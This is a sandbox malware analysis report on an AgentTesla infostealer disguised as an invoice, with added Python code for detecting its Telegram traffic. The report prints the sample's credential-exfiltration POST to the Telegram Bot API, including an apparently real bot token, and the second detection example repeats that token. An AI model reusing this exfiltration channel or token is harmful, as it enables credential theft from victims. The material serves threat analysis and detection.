Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 532735
Start date: 02.12.2021
Start time: 16:53:42
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 42s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Invoice_PDF.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/1@1/1
EGA Information: Failed
HDC Information:
• Successful, ratio: 0.3% (good quality ratio 0.1%)
• Quality average: 24.8%
• Quality standard deviation: 36.9%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 78
• Number of non-executed functions: 7
                                                        Cookbook Comments:
                                                        • Adjust boot time
                                                        • Enable AMSI
                                                        • Found application associated with file extension: .exe
                                                        Warnings:
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                        • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                        Simulations

                                                        Behavior and APIs

Time | Type | Description
16:54:51 | API Interceptor | 701x Sleep call for process: Invoice_PDF.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

Match: 149.154.167.220
Associated samples (all detected as malicious):
• SWIFT_ADVICE.exe
• Overdue outstanding payment.exe
• proforma invoice packing list.exe
• KG236KQE0b.exe
• TT COPY.exe
• proforma invoice packing list.exe
• PROFORMA.EXE
• Proforma-Invoice CAC1105 CI&PL.exe
• 8VVKoakLYt.exe
• SecuriteInfo.com.Trojan.GenericKD.47502835.19614.exe
• FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
• Quote.exe
• Dhl delivery Express.exe
• stampa_CFS-ITALIA_1123311-655.exe
• Launcher.exe
• BANKASI 657090031.exe
• SecuriteInfo.com.Variant.Barys.226418.1879.exe
• SecuriteInfo.com.Trojan.GenericKD.38103794.11009.exe
• SecuriteInfo.com.Trojan.SpyBot.1125.26781.exe
• Emailing Swift.exe

                                                                                                Domains

Match: api.telegram.org
Associated samples (all detected as malicious; context IP 149.154.167.220 for each):
• New Order4687334.exe
• SWIFT_ADVICE.exe
• Overdue outstanding payment.exe
• proforma invoice packing list.exe
• KG236KQE0b.exe
• TT COPY.exe
• Invoice.doc.scr.exe
• proforma invoice packing list.exe
• PROFORMA.EXE
• Proforma-Invoice CAC1105 CI&PL.exe
• 8VVKoakLYt.exe
• SecuriteInfo.com.Trojan.GenericKD.47502835.19614.exe
• FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
• Quote.exe
• Dhl delivery Express.exe
• stampa_CFS-ITALIA_1123311-655.exe
• Launcher.exe
• BANKASI 657090031.exe
• SecuriteInfo.com.Variant.Barys.226418.1879.exe
• SecuriteInfo.com.Trojan.GenericKD.38103794.11009.exe

                                                                                                ASN

Match: TELEGRAMRU
Associated samples (all detected as malicious; context IP in parentheses):
• SWIFT_ADVICE.exe (149.154.167.220)
• Overdue outstanding payment.exe (149.154.167.220)
• proforma invoice packing list.exe (149.154.167.220)
• KG236KQE0b.exe (149.154.167.220)
• TT COPY.exe (149.154.167.220)
• proforma invoice packing list.exe (149.154.167.220)
• PROFORMA.EXE (149.154.167.220)
• Proforma-Invoice CAC1105 CI&PL.exe (149.154.167.220)
• 8VVKoakLYt.exe (149.154.167.220)
• SecuriteInfo.com.Trojan.GenericKD.47502835.19614.exe (149.154.167.220)
• nkXzJnW7AH.exe (149.154.167.99)
• FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe (149.154.167.220)
• Quote.exe (149.154.167.220)
• Dhl delivery Express.exe (149.154.167.220)
• stampa_CFS-ITALIA_1123311-655.exe (149.154.167.220)
• Launcher.exe (149.154.167.220)
• BANKASI 657090031.exe (149.154.167.220)
• SecuriteInfo.com.Variant.Barys.226418.1879.exe (149.154.167.220)
• SecuriteInfo.com.Trojan.GenericKD.38103794.11009.exe (149.154.167.220)
• SecuriteInfo.com.Trojan.SpyBot.1125.26781.exe (149.154.167.220)

                                                                                                JA3 Fingerprints

Match: 3b5074b1b5d032e5620f69f9f700ff0e
Associated samples (all detected as malicious; context IP 149.154.167.220 for each):
• AegEywmjUJ.exe
• 3t9XLLs9ae.exe
• mzSVrYKRrI.exe
• SWIFT_ADVICE.exe
• NOTIFICACION DE CITACION No. 0988-02043-2020. OFICINA DE TALENTO HUMANO.exe
• DHL_119040 receipt document,pdf.exe
• WK1CQtJu13.exe
• SecuriteInfo.com.W32.AIDetect.malware1.19028.exe
• support.Client.exe
• ysNX6q4xm1.exe
• YXD40hGJU8.exe
• Orden de Compra -AR95647.exe
• DHL Receipt Document,pdf.exe
• Glory Hack.exe
• GenshinHack.exe
• Overdue outstanding payment.exe
• proforma invoice packing list.exe
• KG236KQE0b.exe
• Gracehealthmi.org7X9YCEB6AI.htm
• iXVF1Qz1k5.exe

                                                                                                Dropped Files

                                                                                                No context

                                                                                                Created / dropped Files

                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Invoice_PDF.exe.log
Process: C:\Users\user\Desktop\Invoice_PDF.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.355304211458859
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5: FED34146BF2F2FA59DCF8702FCC8232E
SHA1: B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256: 123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512: 1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious: true
Reputation: high, very likely benign file
                                                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Entropy (8bit):7.900031011690095
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                File name:Invoice_PDF.exe
                                                                                                File size:584704
                                                                                                MD5:1dcc43f272f66d8e5afe11e7276dd122
                                                                                                SHA1:cb6a88d1443e7cca944a4176e2a8ebc205f715e3
                                                                                                SHA256:0c6a99b9327cbcb0f3c5b18bc93d347ec8adcb3686e562c515ee4388713e8ed7
                                                                                                SHA512:d3b4b4c93a0b1be2b3effe11e1a4db954f65dc9edf722310ee43defa5cecce6f717fc518b9735c71ef4fac53202c3d314ee6e7e0aab789bc881e4eab6e65a111
                                                                                                SSDEEP:12288:iRyDALnKCZh9TgD29MIY9s0cWEq84Xs10/FKVKmyglGETvHrJrEvE:Yp/jTg6Kxs0cABXe0/Fu3/TlEM
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'..a..............0.................. ........@.. .......................@............@................................

                                                                                                File Icon

                                                                                                Icon Hash:00828e8e8686b000

                                                                                                Static PE Info

                                                                                                General

                                                                                                Entrypoint:0x48fe8e
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:false
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                Time Stamp:0x619DD327 [Wed Nov 24 05:52:39 2021 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:v4.0.30319
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                Entrypoint Preview

Instruction
jmp dword ptr [00402000h]

The jump goes through the single IAT slot at RVA 0x2000 (image base 0x400000; see the IAT entry under Data Directories and the mscoree.dll import below), which is the _CorExeMain stub every .NET executable starts with. The bytes that follow the stub are zero padding; the disassembler renders them as a long run of "add byte ptr [eax], al" (opcode 00 00), which is omitted here.

                                                                                                Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x8fe34          0x57          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x90000          0x610         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x92000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                                                Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
.text   0x2000           0x8de94       0x8e000   False     0.927531497579   data       7.91118342624   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0x90000          0x610         0x800     False     0.33984375       data       3.45406453385   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x92000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                Resources

Name         RVA      Size   Type                                                                          Language  Country
RT_VERSION   0x900a0  0x380  data
RT_MANIFEST  0x90420  0x1ea  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                Imports

DLL          Import
mscoree.dll  _CorExeMain

                                                                                                Version Infos

Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Real Estate LTD
Assembly Version  2.9.0.0
InternalName      OverlappedDa.exe
FileVersion       2.8.2.0
CompanyName       Buena Vista Realty Service
LegalTrademarks
Comments
ProductName       ObjectHolderList
ProductVersion    2.8.2.0
FileDescription   ObjectHolderList
OriginalFilename  OverlappedDa.exe
                                                                                                Network Behavior

                                                                                                Network Port Distribution

                                                                                                TCP Packets

Timestamp                           Source Port  Dest Port  Source IP        Dest IP
Dec 2, 2021 16:56:42.434241056 CET  49813        443        192.168.2.5      149.154.167.220
Dec 2, 2021 16:56:42.434289932 CET  443          49813      149.154.167.220  192.168.2.5
Dec 2, 2021 16:56:42.434371948 CET  49813        443        192.168.2.5      149.154.167.220
Dec 2, 2021 16:56:42.534015894 CET  49813        443        192.168.2.5      149.154.167.220
Dec 2, 2021 16:56:42.534053087 CET  443          49813      149.154.167.220  192.168.2.5
Dec 2, 2021 16:56:42.602024078 CET  443          49813      149.154.167.220  192.168.2.5
Dec 2, 2021 16:56:42.602269888 CET  49813        443        192.168.2.5      149.154.167.220
Dec 2, 2021 16:56:42.606867075 CET  49813        443        192.168.2.5      149.154.167.220
Dec 2, 2021 16:56:42.606899023 CET  443          49813      149.154.167.220  192.168.2.5
Dec 2, 2021 16:56:42.607336044 CET  443          49813      149.154.167.220  192.168.2.5
Dec 2, 2021 16:56:42.650398970 CET  49813        443        192.168.2.5      149.154.167.220
Dec 2, 2021 16:56:44.186492920 CET  49813        443        192.168.2.5      149.154.167.220
Dec 2, 2021 16:56:44.216207981 CET  443          49813      149.154.167.220  192.168.2.5
Dec 2, 2021 16:56:44.218369961 CET  49813        443        192.168.2.5      149.154.167.220
Dec 2, 2021 16:56:44.260874033 CET  443          49813      149.154.167.220  192.168.2.5
Dec 2, 2021 16:56:44.311028957 CET  443          49813      149.154.167.220  192.168.2.5
Dec 2, 2021 16:56:44.311120033 CET  443          49813      149.154.167.220  192.168.2.5
Dec 2, 2021 16:56:44.311306000 CET  49813        443        192.168.2.5      149.154.167.220
Dec 2, 2021 16:56:44.312737942 CET  49813        443        192.168.2.5      149.154.167.220

                                                                                                UDP Packets

Timestamp                           Source Port  Dest Port  Source IP    Dest IP
Dec 2, 2021 16:56:42.256400108 CET  55016        53         192.168.2.5  8.8.8.8
Dec 2, 2021 16:56:42.275835037 CET  53           55016      8.8.8.8      192.168.2.5

                                                                                                DNS Queries

Timestamp                           Source IP    Dest IP  Trans ID  OP Code             Name              Type            Class
Dec 2, 2021 16:56:42.256400108 CET  192.168.2.5  8.8.8.8  0x6c77    Standard query (0)  api.telegram.org  A (IP address)  IN (0x0001)

                                                                                                DNS Answers

Timestamp                           Source IP  Dest IP      Trans ID  Reply Code    Name              CName  Address          Type            Class
Dec 2, 2021 16:56:42.275835037 CET  8.8.8.8    192.168.2.5  0x6c77    No error (0)  api.telegram.org         149.154.167.220  A (IP address)  IN (0x0001)

                                                                                                HTTP Request Dependency Graph

                                                                                                • api.telegram.org
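The proxied request shown under HTTPS Proxied Packets below is what a network detection should key on: a POST to api.telegram.org on the Bot API path /bot<id>:<token>/sendDocument, no User-Agent header (the sandbox flags this separately), and a multipart body whose caption begins "New PW Recovered!". The following is an added example, not part of the Joe Sandbox report or of the malware, that parses such a request and classifies it. The request it runs on is constructed to mirror the report's capture: the bot token is made up, the "document" part and the OSFullName line are constructed (the report's decoded caption is cut off at "OSFul"), while chat_id and the caption prefix are the values the report decoded from the body.

```python
"""Parse and classify a Telegram Bot API upload like the one this report captured.

Added example, not part of the Joe Sandbox report or of the malware. SAMPLE_REQUEST
is constructed to mirror the report's capture: the bot token is made up, the
'document' part and the OSFullName line are constructed, while chat_id and the
caption prefix are the values the report decoded from the request body.
"""
import re

# /bot<numeric id>:<token>/<method>; real tokens are 35 characters after the colon
BOT_PATH = re.compile(r"^/bot(?P<bot_id>\d+):(?P<token>[A-Za-z0-9_-]{30,})/(?P<method>[A-Za-z]+)$")
PW_MARKER = "New PW Recovered!"      # caption prefix seen in the report's decoded body

_BOUNDARY = "---------------------------8d9b5ce0c4c9d6d"
_BODY = (
    f"\r\n--{_BOUNDARY}\r\nContent-Disposition: form-data; name=\"chat_id\"\r\n\r\n1952161154"
    f"\r\n--{_BOUNDARY}\r\nContent-Disposition: form-data; name=\"caption\"\r\n\r\n"
    f"{PW_MARKER}\n\nUser Name: user/128757\nOSFullName: Microsoft Windows 10 Pro"
    f"\r\n--{_BOUNDARY}\r\nContent-Disposition: form-data; name=\"document\"; "
    "filename=\"PW_user.html\"\r\nContent-Type: application/octet-stream\r\n\r\n<html></html>"
    f"\r\n--{_BOUNDARY}--\r\n"
).encode()
SAMPLE_REQUEST = (  # constructed; the token below is not a real credential
    "POST /bot123456789:AAExampleTokenNotRealxxxxxxxxxxxxxx/sendDocument HTTP/1.1\r\n"
    f"Content-Type: multipart/form-data; boundary={_BOUNDARY}\r\n"
    "Host: api.telegram.org\r\n"
    f"Content-Length: {len(_BODY)}\r\n"
    "Expect: 100-continue\r\nConnection: Keep-Alive\r\n\r\n"
).encode() + _BODY


def decode_hex_dump(raw: str) -> bytes:
    """Turn the report's space-separated 'Data Raw' hex into bytes."""
    return bytes.fromhex("".join(raw.split()))


def parse_http_request(data: bytes) -> dict:
    """Split a raw HTTP/1.1 request into method, path, lower-cased headers and body."""
    head, _, body = data.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode("latin-1").split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def parse_multipart(content_type: str, body: bytes) -> dict:
    """Minimal multipart/form-data splitter: name -> {'filename', 'value'} (binary-safe)."""
    m = re.search(r'boundary=(?:"([^"]+)"|([^;]+))', content_type)
    if not m:
        return {}
    delimiter = b"--" + (m.group(1) or m.group(2)).strip().encode()
    fields = {}
    for part in body.split(delimiter):
        part = part[2:] if part.startswith(b"\r\n") else part
        part = part[:-2] if part.endswith(b"\r\n") else part
        if not part or part == b"--":
            continue                      # preamble or closing delimiter
        head, _, value = part.partition(b"\r\n\r\n")
        disposition = head.decode("latin-1")
        name = re.search(r'\bname="([^"]*)"', disposition)       # \b keeps 'filename=' out
        filename = re.search(r'filename="([^"]*)"', disposition)
        if name:
            fields[name.group(1)] = {"filename": filename.group(1) if filename else None,
                                     "value": value}
    return fields


def classify(request: dict) -> dict:
    """Flag Bot API traffic and, within it, the credential-upload pattern from the report."""
    m = BOT_PATH.match(request["path"])
    if not m or request["headers"].get("host") != "api.telegram.org":
        return {"telegram_bot_api": False}
    fields = parse_multipart(request["headers"].get("content-type", ""), request["body"])
    caption = fields.get("caption", {}).get("value", b"").decode("utf-8", "replace")
    return {
        "telegram_bot_api": True,
        "bot_id": m["bot_id"],
        "method": m["method"],
        "chat_id": fields.get("chat_id", {}).get("value", b"").decode("utf-8", "replace"),
        "attachment": fields.get("document", {}).get("filename"),
        "caption_first_line": caption.splitlines()[0] if caption else "",
        "no_user_agent": "user-agent" not in request["headers"],   # also noted by the sandbox
        "agenttesla_pw_exfil": m["method"] == "sendDocument" and caption.startswith(PW_MARKER),
    }


if __name__ == "__main__":
    print(classify(parse_http_request(SAMPLE_REQUEST)))
```

Two practical notes. The bot id and token in the path are the operator's credential for that bot, so a capture like this one is sensitive and should be handled as such rather than pasted around; and the only field you can match on before TLS is stripped is the SNI/DNS name api.telegram.org, so the caption and path checks above belong in a proxy or sandbox that sees plaintext, as the report's HTTPS proxy did.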

                                                                                                HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49813 | 149.154.167.220 | 443 | C:\Users\user\Desktop\Invoice_PDF.exe

Timestamp | kBytes transferred | Direction | Data
2021-12-02 15:56:44 UTC | 0 | OUT | POST /bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8d9b5ce0c4c9d6d
    Host: api.telegram.org
    Content-Length: 1009
    Expect: 100-continue
    Connection: Keep-Alive
2021-12-02 15:56:44 UTC | 0 | IN | HTTP/1.1 100 Continue
2021-12-02 15:56:44 UTC | 0 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 62 35 63 65 30 63 34 63 39 64 36 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 39 35 32 31 36 31 31 35 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 62 35 63 65 30 63 34 63 39 64 36 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 61 6c 66 6f 6e 73 2f 31 32 38 37 35 37 0a 4f 53 46 75 6c
    Data Ascii: -----------------------------8d9b5ce0c4c9d6dContent-Disposition: form-data; name="chat_id"1952161154-----------------------------8d9b5ce0c4c9d6dContent-Disposition: form-data; name="caption"New PW Recovered!User Name: user/128757OSFul
2021-12-02 15:56:44 UTC | 1 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Thu, 02 Dec 2021 15:56:44 GMT
    Content-Type: application/json
    Content-Length: 606
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    {"ok":true,"result":{"message_id":442,"from":{"id":1900392974,"is_bot":true,"first_name":"UdLogzx","username":"UdLogzx_bot"},"chat":{"id":1952161154,"first_name":"John","last_name":"ju","type":"private"},"date":1638460604,"document":{"file_name":"user-128757 2021-12-02 07-57-32.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIBumGo7LwUeqe_8YHaAhGE1dXH7B9tAAIaEgACKbtIUf8qmO1rIsZlIgQ","file_unique_id":"AgADGhIAAim7SFE","file_size":437},"caption":"New PW Recovered!\n\nUser Name: user/128757\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}
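The exchange above is the whole C2 channel of this sample: a `sendDocument` call to the Telegram Bot API, with the bot token carried in the URL path and the destination chat carried as a multipart form field, and the stolen credentials attached as an HTML document (the 200 OK echoes the file name, its size and the receiving chat). The request capture is cut off inside the caption, so any parser run over it has to cope with a final part that never reaches its closing delimiter. The following is an added example, not code from the report or from Joe Sandbox, that extracts those indicators from a constructed copy of the request (same request line, headers, chat_id and caption prefix; the body is rebuilt here rather than copied from the hex dump) and checks them against the JSON the API returned:

```python
import json
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample: rebuilt from the POST shown above, cut off after the
# caption exactly as the capture is. Not a byte-for-byte copy of the hex dump.
BOUNDARY = "-" * 27 + "8d9b5ce0c4c9d6d"
DELIM = b"--" + BOUNDARY.encode()          # delimiter line inside the body is "--" + boundary
SAMPLE_REQUEST = b"".join([
    b"POST /bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument HTTP/1.1\r\n",
    b"Content-Type: multipart/form-data; boundary=" + BOUNDARY.encode() + b"\r\n",
    b"Host: api.telegram.org\r\n",
    b"Content-Length: 1009\r\n",
    b"\r\n",                                   # end of headers
    b"\r\n" + DELIM + b"\r\n",                 # the captured body opens with CRLF before the first delimiter
    b'Content-Disposition: form-data; name="chat_id"\r\n\r\n',
    b"1952161154\r\n" + DELIM + b"\r\n",
    b'Content-Disposition: form-data; name="caption"\r\n\r\n',
    b"New PW Recovered!\n\nUser Name: user/128757\nOSFul",   # cut off, as in the capture
])

# The 200 OK body from the report, trimmed to the keys used below.
SAMPLE_RESPONSE = ('{"ok":true,"result":{"message_id":442,'
                   '"from":{"id":1900392974,"is_bot":true,"username":"UdLogzx_bot"},'
                   '"chat":{"id":1952161154,"type":"private"},'
                   '"document":{"file_name":"user-128757 2021-12-02 07-57-32.html","file_size":437}}}')

# Bot API paths embed the full token: /bot<numeric id>:<secret>/<method>
BOT_PATH_RE = re.compile(r"^(?:GET|POST) /bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>\w+)")


def split_request(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Request line, lower-cased header map and raw body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def boundary_of(content_type: str) -> Optional[str]:
    m = re.search(r'boundary=(?:"([^"]+)"|([^;\s]+))', content_type)
    return (m.group(1) or m.group(2)) if m else None


def parse_multipart(body: bytes, boundary: str) -> Tuple[Dict[str, bytes], List[str]]:
    """Form fields by name, plus the names of parts the capture cut off.
    A complete part ends with CRLF followed by the next delimiter; the closing
    delimiter carries a trailing "--". A part followed by neither was truncated."""
    delim = b"--" + boundary.encode()
    fields: Dict[str, bytes] = {}
    truncated: List[str] = []
    for chunk in body.split(delim)[1:]:             # [0] is the preamble
        if chunk.startswith(b"--"):
            break                                    # closing delimiter: message complete
        part_head, sep, part_body = chunk.partition(b"\r\n\r\n")
        name_m = re.search(rb'name="([^"]*)"', part_head)
        if not sep or not name_m:
            continue                                 # part headers cut off or unnamed part
        name = name_m.group(1).decode()
        if part_body.endswith(b"\r\n"):
            part_body = part_body[:-2]               # that CRLF belongs to the following delimiter
        else:
            truncated.append(name)
        fields[name] = part_body
    return fields, truncated


def extract_iocs(raw: bytes) -> Dict[str, object]:
    request_line, headers, body = split_request(raw)
    m = BOT_PATH_RE.match(request_line)
    if not m:
        return {"telegram_bot_api": False}
    boundary = boundary_of(headers.get("content-type", ""))
    fields, truncated = parse_multipart(body, boundary) if boundary else ({}, [])
    return {
        "telegram_bot_api": True,
        "host": headers.get("host"),
        "bot_id": m["bot_id"],
        "bot_token": f"{m['bot_id']}:{m['secret']}",   # the credential to report/block
        "api_method": m["method"],
        "fields": {k: v.decode("utf-8", "replace") for k, v in fields.items()},
        "truncated_fields": truncated,
    }


def correlate(iocs: Dict[str, object], response_json: str) -> Dict[str, object]:
    """Tie the request to the API echo: bot identity, receiving chat, file that left."""
    r = json.loads(response_json)["result"]
    return {
        "bot_username": r["from"]["username"],
        "bot_id_matches": str(r["from"]["id"]) == iocs["bot_id"],
        "chat_id_matches": str(r["chat"]["id"]) == iocs["fields"].get("chat_id"),
        "exfiltrated_file": r["document"]["file_name"],
    }


if __name__ == "__main__":
    found = extract_iocs(SAMPLE_REQUEST)
    print(found)
    print(correlate(found, SAMPLE_RESPONSE))
```

The boundary is taken from the Content-Type header rather than hard-coded, and the parser splits on `--` plus that value, which is why the 27-dash header boundary lines up with the 29-dash lines in the ASCII dump. A request whose path matches `/bot<id>:<secret>/` from anything other than a sanctioned Telegram client is a detection on its own; the token extracted here is what a responder reports so the bot can be revoked.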


                                                                                                Code Manipulations

                                                                                                Statistics

                                                                                                CPU Usage


                                                                                                Memory Usage


                                                                                                High Level Behavior Distribution


                                                                                                Behavior


                                                                                                System Behavior

                                                                                                General

Start time: 16:54:43
Start date: 02/12/2021
Path: C:\Users\user\Desktop\Invoice_PDF.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Invoice_PDF.exe"
Imagebase: 0xb90000
File size: 584704 bytes
MD5 hash: 1DCC43F272F66D8E5AFE11E7276DD122
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                Reputation:low

                                                                                                General

Start time: 16:54:52
Start date: 02/12/2021
